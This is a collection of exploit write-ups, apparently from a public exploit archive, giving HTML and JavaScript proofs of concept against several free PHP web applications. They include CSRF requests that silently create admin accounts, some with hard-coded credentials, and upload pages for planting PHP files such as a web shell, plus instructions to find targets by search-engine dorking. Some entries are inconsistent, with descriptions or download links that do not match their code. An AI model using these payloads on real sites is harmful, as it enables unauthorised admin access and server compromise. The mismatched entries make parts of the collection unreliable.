<pre><code>=============================================================================================================================================<br />| # Title : online shopping system master v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://download-media.code-projects.org/2020/04/Online_Shopping_IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code create a new admin .<br /><br />[+] Go to the line 7.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : /admin/adduser.php.<br /><br />[+] save code as poc.html .<br /><br /><div class="card"><br /> <div class="card-header card-header-primary"><br /> <h4 class="card-title">Add Users</h4><br /> <p class="card-category">Complete User profile</p><br /> </div><br /> <div class="card-body"><br /> <form action="http://127.0.0.1/online-shopping-system-master/admin/adduser.php" method="post" name="form" enctype="multipart/form-data"><br /> <div class="row"><br /> <br /> </div><br /> </div><br /> </div><br /> <div class="row"><br /> <div class="col-md-6"><br /> <div class="form-group bmd-form-group"><br /> <label class="bmd-label-floating">Email</label><br /> <input type="email" name="email" id="email" class="form-control" required=""><br /> </div><br /> </div><br /> <div class="col-md-6"><br /> <div class="form-group bmd-form-group"><br /> <label class="bmd-label-floating">Password</label><br /> <input type="password" id="password" name="password" class="form-control" required=""><br /> </div><br /> </div><br /> <br /> <button type="submit" name="btn_save" id="btn_save" class="btn btn-primary pull-right">Update User</button><br /> <div class="clearfix"></div><br /> </form><br /> </div><br /> </div><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Banking System 1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page is designed to remotely upload PHP malicious files directly.<br /> <br />[+] Here’s a breakdown of its components and functionality:<br /><br /> HTML Structure:<br /> DOCTYPE & <html>: Defines the document type and language.<br /> <head>: Contains meta-information about the document like character encoding and viewport settings, and the title of the page.<br /> <body>: Contains the main content of the page.<br /><br /> Form Elements:<br /> <form id="uploadForm">: A form with the ID "uploadForm" that contains input fields and a button for file upload.<br /> <label> and <input> fields: Collect information from the user:<br /> Target IP: IP address where the file will be uploaded.<br /> Attacker IP: The IP address of the attacker (though this field is not used in the script).<br /> Attacker Port: The port number of the attacker (not used in the script).<br /> File Input: Allows the user to select a file to upload.<br /> <button>: A button that triggers the file upload process when clicked.<br /><br /> JavaScript Functionality:<br /> uploadFile(): Function executed when the "Upload File" button is clicked.<br /> Collects input values: Retrieves values from the input fields and the selected file.<br /> Validation: Checks if all fields are filled and a file is selected. Alerts the user if any field is missing.<br /> FormData Object: Creates a FormData object to package the file and additional data (name with the value 'PWNED').<br /> fetch API: Sends a POST request to the target IP with the file attached:<br /> URL: http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings<br /> Response Handling: Logs success or failure based on the server's response. If the response is '1', it indicates success; otherwise, it logs an error.<br /><br /> Security Note:<br /> Potential Risk: This script is for educational purposes, and its functionality (uploading a file to a specified server) could be misused. <br /> It’s crucial to ensure that any file upload functionality is properly secured and validated to prevent unauthorized access or attacks.<br /><br /><br />[+] Line 45 set url of target.<br /><br />[+] Choose the target IP .<br /><br />[+] Put any IP address of your own .<br /><br />[+] Put any port .<br /><br />[+] The path to upload the files : http://localhost/banking/uploads/<br /><br />[+] Save Code as html :<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Direct File Upload</title><br /></head><br /><body><br /><br /> <h2>Direct File Upload</h2><br /> <form id="uploadForm"><br /> <label for="targetIP">Target IP:</label><br /> <input type="text" id="targetIP" name="targetIP" required><br><br><br /><br /> <label for="attackerIP">Attacker IP:</label><br /> <input type="text" id="attackerIP" name="attackerIP" required><br><br><br /><br /> <label for="attackerPort">Attacker Port:</label><br /> <input type="number" id="attackerPort" name="attackerPort" required><br><br><br /><br /> <label for="fileInput">Select File:</label><br /> <input type="file" id="fileInput" name="fileInput" required><br><br><br /><br /> <button type="button" onclick="uploadFile()">Upload File</button><br /> </form><br /><br /> <script><br /> function uploadFile() {<br /> const targetIP = document.getElementById('targetIP').value;<br /> const attackerIP = document.getElementById('attackerIP').value;<br /> const attackerPort = document.getElementById('attackerPort').value;<br /> const fileInput = document.getElementById('fileInput').files[0];<br /><br /> if (!targetIP || !attackerIP || !attackerPort || !fileInput) {<br /> alert('Please fill in all fields and select a file.');<br /> return;<br /> }<br /><br /> const formData = new FormData();<br /> formData.append('name', 'PWNED');<br /> formData.append('img', fileInput);<br /><br /> console.log("(+) Uploading file...");<br /><br /> fetch(`http://${targetIP}/banking/classes/SystemSettings.php?f=update_settings`, {<br /> method: 'POST',<br /> body: formData<br /> })<br /> .then(response => response.text())<br /> .then(data => {<br /> if (data === '1') {<br /> console.log("(+) File upload seems to have been successful!");<br /> } else {<br /> console.log("(-) Oh no, the file upload seems to have failed!");<br /> }<br /> })<br /> .catch(error => console.error("(-) Error during file upload:", error));<br /> }<br /> </script><br /><br /></body><br /></html><br /><br /><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online ID Generator 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> FormData Object:<br /> <br /> The FormData object is created to hold the form's data, including the file upload.<br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br />[+] Backend Requirements :<br /><br /> The server-side script (Users.php) should be capable of handling the incoming POST request, <br /> processing the form data (including saving the file), and returning an appropriate response.<br /><br /> This form can be improved by adding additional client-side validations, better error handling, <br /> and perhaps enhancing security measures, such as sanitizing inputs on the server side.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <label for="img">Avatar:</label><br /> <input type="file" id="img" name="img" accept="image/*"><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/id_generator/classes/Users.php?f=save", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Diagnostic Lab Management System v1.0 Remote File Upload Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 9.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] infected file : diagnostic/manage_website.php.<br /><br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Upload Website Image</title><br /></head><br /><body><br /> <form action="http://127.0.0.1/diagnostic/manage_website.php" method="POST" enctype="multipart/form-data"><br /> <label for="website_image">Upload Website Image:</label><br /> <input type="file" id="website_image" name="website_image" required><br /> <button type="submit" name="btn_web">Submit</button><br /> </form><br /></body><br /></html><br /><br /><br /><br />[+] http://127.0.0.1/diagnostic/assets/uploadImage/Logo/webadmin.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Banking System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/banking.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This HTML page :<br /><br /> is a user registration form that allows users to input a username, password, and upload an avatar image. <br /> The form data is then sent via an AJAX request to a server-side script for processing.<br /><br />[+] Here's a breakdown of how it works:<br /><br /> HTML Structure<br /><br /> Form Elements:<br /> <br /> username: A text field where the user can input their username.<br /> password: A password field for entering a password.<br /> img: A file input for uploading an avatar image (restricted to image file types).<br /><br /> Save User Button:<br /> <br /> An input element with the type button is used to trigger the saveUser() function when clicked.<br /><br />[+] JavaScript (AJAX Request)<br /><br /> FormData Object:<br /> <br /> The FormData object is created to hold the form's data, including the file upload.<br /> <br /> AJAX Request:<br /> <br /> An XMLHttpRequest object (xhr) is used to send the form data to a server-side script (Users.php).<br /> The request method is POST, and the data is sent to the specified URL.<br /> The onload function checks if the request was successful (status code 200). If it was,<br /> it alerts the user that the save was successful; otherwise, it alerts the user of an error.<br /><br />[+] Backend Requirements :<br /><br /> The server-side script (Users.php) should be capable of handling the incoming POST request, <br /> processing the form data (including saving the file), and returning an appropriate response.<br /><br /> This form can be improved by adding additional client-side validations, better error handling, <br /> and perhaps enhancing security measures, such as sanitizing inputs on the server side.<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <label for="img">Avatar:</label><br /> <input type="file" id="img" name="img" accept="image/*"><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/banking/classes/Users.php?f=save", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Music Gallery Site v1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-music.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following JavaScript code :<br /><br /> creating a POST request using JavaScript to send certain data to a local server via HTTP. Here are the key points:<br /><br />[+] Create an XMLHttpRequest object:<br /><br /> xhr = new XMLHttpRequest(); Creates an XMLHttpRequest object that is used to send requests to the server.<br /><br />[+] Open the request:<br /><br /> xhr.open("POST", "http://127.0.0.1/php-music/classes/Users.php?f=save", true); Opens a connection to the specified URL (in this case, a local server) using the HTTP method "POST".<br /><br />[+] Set the request headers:<br /><br /> xhr.setRequestHeader("Accept", "*/*"); Specifies that the request accepts any type of response.<br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); Specifies that the request accepts responses in English.<br /> xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------"); Specifies the content type of the request as multipart/form-data with specified boundaries.<br /><br />[+] Enable sending cookies:<br /><br /> xhr.withCredentials = true; Specifies that cookies should be sent with the request.<br /><br />[+] Setting up the request data:<br /><br /> The body is set up using a string containing the form data parts. Each part contains information such as username, password, and type.<br /><br /> This string is converted to a Uint8Array and then to a Blob to be sent.<br /><br />[+] Sending the request:<br /><br /> xhr.send(new Blob([aBody])); Sends the data to the server.<br /><br />[+] User Interface:<br /> There is a button inside the HTML form that calls the submitRequest() function when clicked, which executes the request.<br /><br />[+] Go to the line 6. Set the target site link Save changes and apply . <br /><br />[+] infected file : Users.php.<br /><br />[+] Line 15 : Choose a name "indoushka".<br /><br />[+] Line 19 : Choose a password "Hacked".<br /><br />[+] save code as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http:\/\/127.0.0.1\/php-music\/classes\/Users.php?f=save", true); <br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Multi-Vendor Online Groceries Management System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/mvogms_2.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] This payload add new admin user .<br /><br />[+] save payload as poc.html <br /><br />[+] line 27 Set your target url<br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://localhost/mvogms/classes/Users.php?f=save", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Medical Center Portal 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/medic.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The following html code uploads a executable malicious file remotely .<br /><br />[+] Go to the line 52.<br /><br />[+] Set the target site link Save changes and apply . <br /><br />[+] save code as poc.html .<br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>Registration Form</title><br /> <style><br /> body {<br /> font-family: Arial, sans-serif;<br /> margin: 20px;<br /> padding: 20px;<br /> max-width: 600px;<br /> background-color: #f4f4f4;<br /> border-radius: 8px;<br /> }<br /> .form-container {<br /> display: flex;<br /> flex-direction: column;<br /> }<br /> .form-group {<br /> margin-bottom: 15px;<br /> }<br /> .form-group label {<br /> font-weight: bold;<br /> margin-bottom: 5px;<br /> display: block;<br /> }<br /> .form-group input, .form-group select {<br /> padding: 8px;<br /> width: 100%;<br /> border: 1px solid #ccc;<br /> border-radius: 4px;<br /> }<br /> .form-group select {<br /> cursor: pointer;<br /> }<br /> .form-group button {<br /> padding: 10px 15px;<br /> background-color: #007bff;<br /> color: white;<br /> border: none;<br /> cursor: pointer;<br /> border-radius: 4px;<br /> }<br /> .form-group button:hover {<br /> background-color: #0056b3;<br /> }<br /> </style><br /></head><br /><body><br /> <h2>Registration Form</h2><br /> <form action="http://127.0.0.1/medic/pages/register.php?action=add" method="POST" class="form-container"><br /> <div class="form-group"><br /> <label for="firstname">First Name:</label><br /> <input type="text" id="firstname" name="firstname" required><br /> </div><br /> <div class="form-group"><br /> <label for="nid">National ID (NID):</label><br /> <input type="text" id="nid" name="nid" required><br /> </div><br /> <div class="form-group"><br /> <label for="gender">Gender:</label><br /> <select id="gender" name="gender" required><br /> <option value="">Select Gender</option><br /> <option value="male">Male</option><br /> <option value="female">Female</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label for="email">Email:</label><br /> <input type="email" id="email" name="email" required><br /> </div><br /> <div class="form-group"><br /> <label for="phonenumber">Phone Number:</label><br /> <input type="text" id="phonenumber" name="phonenumber" required><br /> </div><br /> <div class="form-group"><br /> <label for="jobs">Job:</label><br /> <select id="jobs" name="jobs" required><br /> <option value="">Select Job</option><br /> <option value="doctor">Doctor</option><br /> <option value="nurse">Nurse</option><br /> <option value="pharmacist">Pharmacist</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label for="province">Province:</label><br /> <select id="province" name="province" required><br /> <option value="">Select Province</option><br /> <option value="province1">Province 1</option><br /> <option value="province2">Province 2</option><br /> <option value="province3">Province 3</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label for="city">City:</label><br /> <select id="city" name="city" required><br /> <option value="">Select City</option><br /> <option value="city1">City 1</option><br /> <option value="city2">City 2</option><br /> <option value="city3">City 3</option><br /> </select><br /> </div><br /> <div class="form-group"><br /> <label for="username">Username:</label><br /> <input type="text" id="username" name="username" required><br /> </div><br /> <div class="form-group"><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br /> </div><br /> <div class="form-group"><br /> <button type="submit">Register</button><br /> </div><br /> </form><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Event Registration and Attendance System 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /> <br />[+] Line 27 : Set your target url<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html><br /><html lang="en"><br /><head><br /> <meta charset="UTF-8"><br /> <meta name="viewport" content="width=device-width, initial-scale=1.0"><br /> <title>User Registration</title><br /></head><br /><body><br /><br /> <h2>User Registration</h2><br /> <form id="userForm" enctype="multipart/form-data"><br /> <label for="username">User Name:</label><br /> <input type="username" id="username" name="username" required><br><br><br /><br /> <label for="password">Password:</label><br /> <input type="password" id="password" name="password" required><br><br><br /><br /> <input type="button" value="Save User" onclick="saveUser()"><br /> </form><br /><br /> <script><br /> function saveUser() {<br /> var form = document.getElementById('userForm');<br /> var formData = new FormData(form);<br /><br /> var xhr = new XMLHttpRequest();<br /> xhr.open("POST", "http://127.0.0.1/news_portal/admin/ajax.php?action=save_user", true);<br /><br /> xhr.onload = function () {<br /> if (xhr.status === 200) {<br /> alert('User saved successfully');<br /> } else {<br /> alert('An error occurred while saving the user');<br /> }<br /> };<br /><br /> xhr.send(formData);<br /> }<br /> </script><br /><br /></body><br /></html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : cab management system 1.0 CSRF Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /> <br />[+] Line 6 : Set your target url<br /><br />[+] Line 15+19 : Set your user & pass<br /><br />[+] save payload as poc.html <br /><br />[+] payload : <br /><br /><!DOCTYPE html> <br /><html> <br /><body><br /> <script> function submitRequest() <br /> { var xhr = new XMLHttpRequest(); <br /> xhr.open("POST", "http://127.0.0.1/cms/classes/Users.php?f=save", true);<br /> xhr.setRequestHeader("Accept", "*\/*"); <br /> xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");<br /> xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");<br /> xhr.withCredentials = true; <br /> var body =<br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"username\"\r\n" + <br /> "\r\n" + <br /> "indoushka\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"password\"\r\n" + <br /> "\r\n" + <br /> "Hacked\r\n" + <br /> "-----------------------------\r\n" + <br /> "Content-Disposition: form-data; name=\"type\"\r\n" + <br /> "\r\n" + <br /> "1\r\n" + <br /> "-------------------------------\r\n"; <br /> var aBody = new Uint8Array(body.length); <br /> for (var i = 0; i < aBody.length; i++) <br /> aBody[i] = body.charCodeAt(i); <br /> xhr.send(new Blob([aBody])); <br /> }<br /> </script><br /> <form action="#"><br /> <input type="button" value="Submit request" onclick="submitRequest();" /><br /> </form> <br /> </body> <br /> </html><br /><br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>